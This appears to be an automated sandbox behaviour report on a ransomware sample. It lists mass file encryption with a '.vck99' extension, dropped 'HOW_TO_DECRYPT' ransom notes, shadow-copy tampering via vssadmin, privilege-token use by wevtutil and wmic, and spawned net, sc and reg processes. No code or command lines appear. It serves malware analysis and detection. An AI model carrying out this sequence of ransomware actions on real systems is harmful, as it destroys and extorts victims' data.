File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsFeedbackHub_1.1907.3152.0_x64__8wekyb3d8bbwe\Assets\Retail\Retail_Feedback_icon.png C:\Users\Admin\AppData\Local\Temp\c5ea00ea5973347d54d66f12fb5ee242_JaffaCakes118.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.YourPhone_0.19051.7.0_x64__8wekyb3d8bbwe\Assets\AppTiles\AppIcon.targetsize-36_altform-unplated.png C:\Users\Admin\AppData\Local\Temp\c5ea00ea5973347d54d66f12fb5ee242_JaffaCakes118.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\it-it\ui-strings.js.MlpTf-Xi8ftPUdYphuklM0r8MH_Q5-US-r19IvPVLkL_Sxy_b5kzBu00.vck99 C:\Users\Admin\AppData\Local\Temp\c5ea00ea5973347d54d66f12fb5ee242_JaffaCakes118.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\fr-fr\phLK_HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\c5ea00ea5973347d54d66f12fb5ee242_JaffaCakes118.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\ProPlusVL_MAK-ppd.xrm-ms.MlpTf-Xi8ftPUdYphuklM0r8MH_Q5-US-r19IvPVLkL_Q8H6b2FOVPI0.vck99 C:\Users\Admin\AppData\Local\Temp\c5ea00ea5973347d54d66f12fb5ee242_JaffaCakes118.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.WebMediaExtensions_1.0.20875.0_x64__8wekyb3d8bbwe\Assets\contrast-white\SmallTile.scale-200_contrast-white.png C:\Users\Admin\AppData\Local\Temp\c5ea00ea5973347d54d66f12fb5ee242_JaffaCakes118.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsAlarms_10.1906.2182.0_neutral_split.scale-100_8wekyb3d8bbwe\Assets\TimerWideTile.contrast-black_scale-100.png C:\Users\Admin\AppData\Local\Temp\c5ea00ea5973347d54d66f12fb5ee242_JaffaCakes118.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\ro-ro\phLK_HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\c5ea00ea5973347d54d66f12fb5ee242_JaffaCakes118.exe N/A
File opened for modification C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.WindowsMaps_5.1906.1972.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\SecondaryTiles\TrafficHub\contrast-black\LargeTile.scale-125.png C:\Users\Admin\AppData\Local\Temp\c5ea00ea5973347d54d66f12fb5ee242_JaffaCakes118.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\apple-touch-icon-144x144-precomposed.png.MlpTf-Xi8ftPUdYphuklM0r8MH_Q5-US-r19IvPVLkL_Yf7e_p87DFI0.vck99 C:\Users\Admin\AppData\Local\Temp\c5ea00ea5973347d54d66f12fb5ee242_JaffaCakes118.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\images\themes\dark\nub.png.MlpTf-Xi8ftPUdYphuklM0r8MH_Q5-US-r19IvPVLkL_dKFr-KM-D5s0.vck99 C:\Users\Admin\AppData\Local\Temp\c5ea00ea5973347d54d66f12fb5ee242_JaffaCakes118.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\nls\sk-sk\ui-strings.js.MlpTf-Xi8ftPUdYphuklM0r8MH_Q5-US-r19IvPVLkL_8B1_Sepony80.vck99 C:\Users\Admin\AppData\Local\Temp\c5ea00ea5973347d54d66f12fb5ee242_JaffaCakes118.exe N/A
File opened for modification C:\Program Files (x86)\WindowsPowerShell\Modules\Microsoft.PowerShell.Operation.Validation\1.0.1\OperationValidationResources.psd1 C:\Users\Admin\AppData\Local\Temp\c5ea00ea5973347d54d66f12fb5ee242_JaffaCakes118.exe N/A
File opened for modification C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.Windows.Photos_2019.19071.12548.0_neutral_split.scale-100_8wekyb3d8bbwe\Assets\PhotosSmallTile.contrast-white_scale-100.png C:\Users\Admin\AppData\Local\Temp\c5ea00ea5973347d54d66f12fb5ee242_JaffaCakes118.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.BingWeather_4.25.20211.0_x64__8wekyb3d8bbwe\Assets\AppTiles\LiveTile\5px.png C:\Users\Admin\AppData\Local\Temp\c5ea00ea5973347d54d66f12fb5ee242_JaffaCakes118.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsFeedbackHub_1.1907.3152.0_x64__8wekyb3d8bbwe\Assets\InsiderHubAppList.targetsize-36_altform-unplated_contrast-black.png C:\Users\Admin\AppData\Local\Temp\c5ea00ea5973347d54d66f12fb5ee242_JaffaCakes118.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.YourPhone_0.19051.7.0_neutral_split.scale-100_8wekyb3d8bbwe\AppxBlockMap.xml C:\Users\Admin\AppData\Local\Temp\c5ea00ea5973347d54d66f12fb5ee242_JaffaCakes118.exe N/A
File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\contrast-black\ExchangeMediumTile.scale-400.png C:\Users\Admin\AppData\Local\Temp\c5ea00ea5973347d54d66f12fb5ee242_JaffaCakes118.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer-select\js\nls\eu-es\ui-strings.js.MlpTf-Xi8ftPUdYphuklM0r8MH_Q5-US-r19IvPVLkL_qRox--hM9fM0.vck99 C:\Users\Admin\AppData\Local\Temp\c5ea00ea5973347d54d66f12fb5ee242_JaffaCakes118.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Office16\PAGESIZE\PGLBL120.XML.MlpTf-Xi8ftPUdYphuklM0r8MH_Q5-US-r19IvPVLkL_-HAMpoQ_SmY0.vck99 C:\Users\Admin\AppData\Local\Temp\c5ea00ea5973347d54d66f12fb5ee242_JaffaCakes118.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.MixedReality.Portal_2000.19081.1301.0_neutral_~_8wekyb3d8bbwe\AppxMetadata\AppxBundleManifest.xml C:\Users\Admin\AppData\Local\Temp\c5ea00ea5973347d54d66f12fb5ee242_JaffaCakes118.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.Office.OneNote_16001.12026.20112.0_x64__8wekyb3d8bbwe\images\contrast-black\OneNoteNewNoteWideTile.scale-125.png C:\Users\Admin\AppData\Local\Temp\c5ea00ea5973347d54d66f12fb5ee242_JaffaCakes118.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\vfs\Fonts\private\WINGDNG2.TTF.MlpTf-Xi8ftPUdYphuklM0r8MH_Q5-US-r19IvPVLkL_xrwb8q1Hfws0.vck99 C:\Users\Admin\AppData\Local\Temp\c5ea00ea5973347d54d66f12fb5ee242_JaffaCakes118.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsCamera_2018.826.98.0_x64__8wekyb3d8bbwe\Assets\WindowsIcons\WindowsCameraAppList.targetsize-36_altform-lightunplated.png C:\Users\Admin\AppData\Local\Temp\c5ea00ea5973347d54d66f12fb5ee242_JaffaCakes118.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\Multimedia\MPP\QuickTime.mpp.MlpTf-Xi8ftPUdYphuklM0r8MH_Q5-US-r19IvPVLkL_g2yrrQJPhUk0.vck99 C:\Users\Admin\AppData\Local\Temp\c5ea00ea5973347d54d66f12fb5ee242_JaffaCakes118.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\js\nls\en-gb\phLK_HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\c5ea00ea5973347d54d66f12fb5ee242_JaffaCakes118.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.Microsoft3DViewer_6.1908.2042.0_x64__8wekyb3d8bbwe\Assets\Config\ShellPreviewConfig.json C:\Users\Admin\AppData\Local\Temp\c5ea00ea5973347d54d66f12fb5ee242_JaffaCakes118.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.XboxGamingOverlay_2.34.28001.0_x64__8wekyb3d8bbwe\Assets\GameBar_AppList.targetsize-48_altform-unplated.png C:\Users\Admin\AppData\Local\Temp\c5ea00ea5973347d54d66f12fb5ee242_JaffaCakes118.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\s_anonymoususer_18.svg.MlpTf-Xi8ftPUdYphuklM0r8MH_Q5-US-r19IvPVLkL_H1LmB3GTWWo0.vck99 C:\Users\Admin\AppData\Local\Temp\c5ea00ea5973347d54d66f12fb5ee242_JaffaCakes118.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Integration\C2RManifest.excelmui.msi.16.en-us.xml.MlpTf-Xi8ftPUdYphuklM0r8MH_Q5-US-r19IvPVLkL_cRrzThFP5DI0.vck99 C:\Users\Admin\AppData\Local\Temp\c5ea00ea5973347d54d66f12fb5ee242_JaffaCakes118.exe N/A
File opened for modification C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.XboxApp_48.49.31001.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\GamesXboxHubStoreLogo.scale-125_contrast-high.png C:\Users\Admin\AppData\Local\Temp\c5ea00ea5973347d54d66f12fb5ee242_JaffaCakes118.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.BingWeather_4.25.20211.0_x64__8wekyb3d8bbwe\Assets\AppTiles\WeatherIcons\30x30\199.png C:\Users\Admin\AppData\Local\Temp\c5ea00ea5973347d54d66f12fb5ee242_JaffaCakes118.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.VP9VideoExtensions_1.0.22681.0_x64__8wekyb3d8bbwe\Assets\contrast-black\AppList.targetsize-36_contrast-black.png C:\Users\Admin\AppData\Local\Temp\c5ea00ea5973347d54d66f12fb5ee242_JaffaCakes118.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1906.1972.0_neutral_split.scale-100_8wekyb3d8bbwe\Assets\AppTiles\contrast-black\MapsStoreLogo.scale-100.png C:\Users\Admin\AppData\Local\Temp\c5ea00ea5973347d54d66f12fb5ee242_JaffaCakes118.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.Office.OneNote_16001.12026.20112.0_x64__8wekyb3d8bbwe\images\contrast-white\OneNoteNotebookWideTile.scale-150.png C:\Users\Admin\AppData\Local\Temp\c5ea00ea5973347d54d66f12fb5ee242_JaffaCakes118.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\DataModel\Cartridges\as80.xsl.MlpTf-Xi8ftPUdYphuklM0r8MH_Q5-US-r19IvPVLkL_Z5Z5JBCwLCA0.vck99 C:\Users\Admin\AppData\Local\Temp\c5ea00ea5973347d54d66f12fb5ee242_JaffaCakes118.exe N/A
File opened for modification C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.WindowsMaps_5.1906.1972.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\SecondaryTiles\Directions\Home\RTL\contrast-white\SmallTile.scale-125.png C:\Users\Admin\AppData\Local\Temp\c5ea00ea5973347d54d66f12fb5ee242_JaffaCakes118.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.Getstarted_8.2.22942.0_x64__8wekyb3d8bbwe\Assets\GetStartedAppList.targetsize-64_altform-unplated_contrast-black.png C:\Users\Admin\AppData\Local\Temp\c5ea00ea5973347d54d66f12fb5ee242_JaffaCakes118.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsStore_11910.1002.5.0_x64__8wekyb3d8bbwe\Store.Purchase\Controls\Xbox360PurchaseHostPage.html C:\Users\Admin\AppData\Local\Temp\c5ea00ea5973347d54d66f12fb5ee242_JaffaCakes118.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Office16\MSIPC\ThirdPartyNotices.txt.MlpTf-Xi8ftPUdYphuklM0r8MH_Q5-US-r19IvPVLkL_2Ze_Hfkbkeo0.vck99 C:\Users\Admin\AppData\Local\Temp\c5ea00ea5973347d54d66f12fb5ee242_JaffaCakes118.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.ScreenSketch_10.1907.2471.0_x64__8wekyb3d8bbwe\Assets\ScreenSketchSquare44x44Logo.targetsize-80_altform-lightunplated.png C:\Users\Admin\AppData\Local\Temp\c5ea00ea5973347d54d66f12fb5ee242_JaffaCakes118.exe N/A
File created C:\Program Files (x86)\Common Files\Services\phLK_HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\c5ea00ea5973347d54d66f12fb5ee242_JaffaCakes118.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\images\s_checkbox_selected_18.svg.MlpTf-Xi8ftPUdYphuklM0r8MH_Q5-US-r19IvPVLkL_GpjOaVZxo2E0.vck99 C:\Users\Admin\AppData\Local\Temp\c5ea00ea5973347d54d66f12fb5ee242_JaffaCakes118.exe N/A
File opened for modification C:\Program Files (x86)\Common Files\System\Ole DB\de-DE\sqloledb.rll.mui.MlpTf-Xi8ftPUdYphuklM0r8MH_Q5-US-r19IvPVLkL_upi0tBIsSag0.vck99 C:\Users\Admin\AppData\Local\Temp\c5ea00ea5973347d54d66f12fb5ee242_JaffaCakes118.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\images\themeless\Appstore\phLK_HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\c5ea00ea5973347d54d66f12fb5ee242_JaffaCakes118.exe N/A

Interacts with shadow copies

ransomware
Description Indicator Process Target
N/A N/A C:\Windows\SYSTEM32\vssadmin.exe N/A

Runs net.exe

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeSecurityPrivilege N/A C:\Windows\SYSTEM32\wevtutil.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SYSTEM32\wevtutil.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SYSTEM32\wevtutil.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SYSTEM32\wevtutil.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SYSTEM32\wevtutil.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SYSTEM32\wevtutil.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 36 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 36 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4768 wrote to memory of 2472 N/A C:\Users\Admin\AppData\Local\Temp\c5ea00ea5973347d54d66f12fb5ee242_JaffaCakes118.exe C:\Windows\SYSTEM32\net.exe
PID 4768 wrote to memory of 2472 N/A C:\Users\Admin\AppData\Local\Temp\c5ea00ea5973347d54d66f12fb5ee242_JaffaCakes118.exe C:\Windows\SYSTEM32\net.exe
PID 2472 wrote to memory of 4404 N/A C:\Windows\SYSTEM32\net.exe C:\Windows\system32\net1.exe
PID 2472 wrote to memory of 4404 N/A C:\Windows\SYSTEM32\net.exe C:\Windows\system32\net1.exe
PID 4768 wrote to memory of 4536 N/A C:\Users\Admin\AppData\Local\Temp\c5ea00ea5973347d54d66f12fb5ee242_JaffaCakes118.exe C:\Windows\SYSTEM32\net.exe
PID 4768 wrote to memory of 4536 N/A C:\Users\Admin\AppData\Local\Temp\c5ea00ea5973347d54d66f12fb5ee242_JaffaCakes118.exe C:\Windows\SYSTEM32\net.exe
PID 4536 wrote to memory of 1660 N/A C:\Windows\SYSTEM32\net.exe C:\Windows\system32\net1.exe
PID 4536 wrote to memory of 1660 N/A C:\Windows\SYSTEM32\net.exe C:\Windows\system32\net1.exe
PID 4768 wrote to memory of 820 N/A C:\Users\Admin\AppData\Local\Temp\c5ea00ea5973347d54d66f12fb5ee242_JaffaCakes118.exe C:\Windows\SYSTEM32\net.exe
PID 4768 wrote to memory of 820 N/A C:\Users\Admin\AppData\Local\Temp\c5ea00ea5973347d54d66f12fb5ee242_JaffaCakes118.exe C:\Windows\SYSTEM32\net.exe
PID 820 wrote to memory of 1860 N/A C:\Windows\SYSTEM32\net.exe C:\Windows\system32\net1.exe
PID 820 wrote to memory of 1860 N/A C:\Windows\SYSTEM32\net.exe C:\Windows\system32\net1.exe
PID 4768 wrote to memory of 728 N/A C:\Users\Admin\AppData\Local\Temp\c5ea00ea5973347d54d66f12fb5ee242_JaffaCakes118.exe C:\Windows\SYSTEM32\net.exe
PID 4768 wrote to memory of 728 N/A C:\Users\Admin\AppData\Local\Temp\c5ea00ea5973347d54d66f12fb5ee242_JaffaCakes118.exe C:\Windows\SYSTEM32\net.exe
PID 728 wrote to memory of 4344 N/A C:\Windows\SYSTEM32\net.exe C:\Windows\system32\net1.exe
PID 728 wrote to memory of 4344 N/A C:\Windows\SYSTEM32\net.exe C:\Windows\system32\net1.exe
PID 4768 wrote to memory of 2452 N/A C:\Users\Admin\AppData\Local\Temp\c5ea00ea5973347d54d66f12fb5ee242_JaffaCakes118.exe C:\Windows\SYSTEM32\net.exe
PID 4768 wrote to memory of 2452 N/A C:\Users\Admin\AppData\Local\Temp\c5ea00ea5973347d54d66f12fb5ee242_JaffaCakes118.exe C:\Windows\SYSTEM32\net.exe
PID 2452 wrote to memory of 4160 N/A C:\Windows\SYSTEM32\net.exe C:\Windows\system32\net1.exe
PID 2452 wrote to memory of 4160 N/A C:\Windows\SYSTEM32\net.exe C:\Windows\system32\net1.exe
PID 4768 wrote to memory of 4240 N/A C:\Users\Admin\AppData\Local\Temp\c5ea00ea5973347d54d66f12fb5ee242_JaffaCakes118.exe C:\Windows\SYSTEM32\net.exe
PID 4768 wrote to memory of 4240 N/A C:\Users\Admin\AppData\Local\Temp\c5ea00ea5973347d54d66f12fb5ee242_JaffaCakes118.exe C:\Windows\SYSTEM32\net.exe
PID 4240 wrote to memory of 5000 N/A C:\Windows\SYSTEM32\net.exe C:\Windows\system32\net1.exe
PID 4240 wrote to memory of 5000 N/A C:\Windows\SYSTEM32\net.exe C:\Windows\system32\net1.exe
PID 4768 wrote to memory of 4696 N/A C:\Users\Admin\AppData\Local\Temp\c5ea00ea5973347d54d66f12fb5ee242_JaffaCakes118.exe C:\Windows\SYSTEM32\net.exe
PID 4768 wrote to memory of 4696 N/A C:\Users\Admin\AppData\Local\Temp\c5ea00ea5973347d54d66f12fb5ee242_JaffaCakes118.exe C:\Windows\SYSTEM32\net.exe
PID 4696 wrote to memory of 4152 N/A C:\Windows\SYSTEM32\net.exe C:\Windows\system32\net1.exe
PID 4696 wrote to memory of 4152 N/A C:\Windows\SYSTEM32\net.exe C:\Windows\system32\net1.exe
PID 4768 wrote to memory of 4080 N/A C:\Users\Admin\AppData\Local\Temp\c5ea00ea5973347d54d66f12fb5ee242_JaffaCakes118.exe C:\Windows\SYSTEM32\net.exe
PID 4768 wrote to memory of 4080 N/A C:\Users\Admin\AppData\Local\Temp\c5ea00ea5973347d54d66f12fb5ee242_JaffaCakes118.exe C:\Windows\SYSTEM32\net.exe
PID 4080 wrote to memory of 2208 N/A C:\Windows\SYSTEM32\net.exe C:\Windows\system32\net1.exe
PID 4080 wrote to memory of 2208 N/A C:\Windows\SYSTEM32\net.exe C:\Windows\system32\net1.exe
PID 4768 wrote to memory of 3896 N/A C:\Users\Admin\AppData\Local\Temp\c5ea00ea5973347d54d66f12fb5ee242_JaffaCakes118.exe C:\Windows\SYSTEM32\sc.exe
PID 4768 wrote to memory of 3896 N/A C:\Users\Admin\AppData\Local\Temp\c5ea00ea5973347d54d66f12fb5ee242_JaffaCakes118.exe C:\Windows\SYSTEM32\sc.exe
PID 4768 wrote to memory of 4480 N/A C:\Users\Admin\AppData\Local\Temp\c5ea00ea5973347d54d66f12fb5ee242_JaffaCakes118.exe C:\Windows\SYSTEM32\sc.exe
PID 4768 wrote to memory of 4480 N/A C:\Users\Admin\AppData\Local\Temp\c5ea00ea5973347d54d66f12fb5ee242_JaffaCakes118.exe C:\Windows\SYSTEM32\sc.exe
PID 4768 wrote to memory of 2064 N/A C:\Users\Admin\AppData\Local\Temp\c5ea00ea5973347d54d66f12fb5ee242_JaffaCakes118.exe C:\Windows\SYSTEM32\sc.exe
PID 4768 wrote to memory of 2064 N/A C:\Users\Admin\AppData\Local\Temp\c5ea00ea5973347d54d66f12fb5ee242_JaffaCakes118.exe C:\Windows\SYSTEM32\sc.exe
PID 4768 wrote to memory of 2804 N/A C:\Users\Admin\AppData\Local\Temp\c5ea00ea5973347d54d66f12fb5ee242_JaffaCakes118.exe C:\Windows\SYSTEM32\sc.exe
PID 4768 wrote to memory of 2804 N/A C:\Users\Admin\AppData\Local\Temp\c5ea00ea5973347d54d66f12fb5ee242_JaffaCakes118.exe C:\Windows\SYSTEM32\sc.exe
PID 4768 wrote to memory of 3668 N/A C:\Users\Admin\AppData\Local\Temp\c5ea00ea5973347d54d66f12fb5ee242_JaffaCakes118.exe C:\Windows\SYSTEM32\sc.exe
PID 4768 wrote to memory of 3668 N/A C:\Users\Admin\AppData\Local\Temp\c5ea00ea5973347d54d66f12fb5ee242_JaffaCakes118.exe C:\Windows\SYSTEM32\sc.exe
PID 4768 wrote to memory of 3048 N/A C:\Users\Admin\AppData\Local\Temp\c5ea00ea5973347d54d66f12fb5ee242_JaffaCakes118.exe C:\Windows\SYSTEM32\sc.exe
PID 4768 wrote to memory of 3048 N/A C:\Users\Admin\AppData\Local\Temp\c5ea00ea5973347d54d66f12fb5ee242_JaffaCakes118.exe C:\Windows\SYSTEM32\sc.exe
PID 4768 wrote to memory of 3572 N/A C:\Users\Admin\AppData\Local\Temp\c5ea00ea5973347d54d66f12fb5ee242_JaffaCakes118.exe C:\Windows\SYSTEM32\sc.exe
PID 4768 wrote to memory of 3572 N/A C:\Users\Admin\AppData\Local\Temp\c5ea00ea5973347d54d66f12fb5ee242_JaffaCakes118.exe C:\Windows\SYSTEM32\sc.exe
PID 4768 wrote to memory of 652 N/A C:\Users\Admin\AppData\Local\Temp\c5ea00ea5973347d54d66f12fb5ee242_JaffaCakes118.exe C:\Windows\SYSTEM32\sc.exe
PID 4768 wrote to memory of 652 N/A C:\Users\Admin\AppData\Local\Temp\c5ea00ea5973347d54d66f12fb5ee242_JaffaCakes118.exe C:\Windows\SYSTEM32\sc.exe
PID 4768 wrote to memory of 4352 N/A C:\Users\Admin\AppData\Local\Temp\c5ea00ea5973347d54d66f12fb5ee242_JaffaCakes118.exe C:\Windows\SYSTEM32\reg.exe
PID 4768 wrote to memory of 4352 N/A C:\Users\Admin\AppData\Local\Temp\c5ea00ea5973347d54d66f12fb5ee242_JaffaCakes118.exe C:\Windows\SYSTEM32\reg.exe
PID 4768 wrote to memory of 3060 N/A C:\Users\Admin\AppData\Local\Temp\c5ea00ea5973347d54d66f12fb5ee242_JaffaCakes118.exe C:\Windows\SYSTEM32\reg.exe
PID 4768 wrote to memory of 3060 N/A C:\Users\Admin\AppData\Local\Temp\c5ea00ea5973347d54d66f12fb5ee242_JaffaCakes118.exe C:\Windows\SYSTEM32\reg.exe
PID 4768 wrote to memory of 4332 N/A C:\Users\Admin\AppData\Local\Temp\c5ea00ea5973347d54d66f12fb5ee242_JaffaCakes118.exe C:\Windows\SYSTEM32\reg.exe
PID 4768 wrote to memory of 4332 N/A C:\Users\Admin\AppData\Local\Temp\c5ea00ea5973347d54d66f12fb5ee242_JaffaCakes118.exe C:\Windows\SYSTEM32\reg.exe
PID 4768 wrote to memory of 4564 N/A C:\Users\Admin\AppData\Local\Temp\c5ea00ea5973347d54d66f12fb5ee242_JaffaCakes118.exe C:\Windows\SYSTEM32\reg.exe
PID 4768 wrote to memory of 4564 N/A C:\Users\Admin\AppData\Local\Temp\c5ea00ea5973347d54d66f12fb5ee242_JaffaCakes118.exe C:\Windows\SYSTEM32\reg.exe
PID 4768 wrote to memory of 2212 N/A C:\Users\Admin\AppData\Local\Temp\c5ea00ea5973347d54d66f12fb5ee242_JaffaCakes118.exe C:\Windows\SYSTEM32\reg.exe
PID 4768 wrote to memory of 2212 N/A C:\Users\Admin\AppData\Local\Temp\c5ea00ea5973347d54d66f12fb5ee242_JaffaCakes118.exe C:\Windows\SYSTEM32\reg.exe
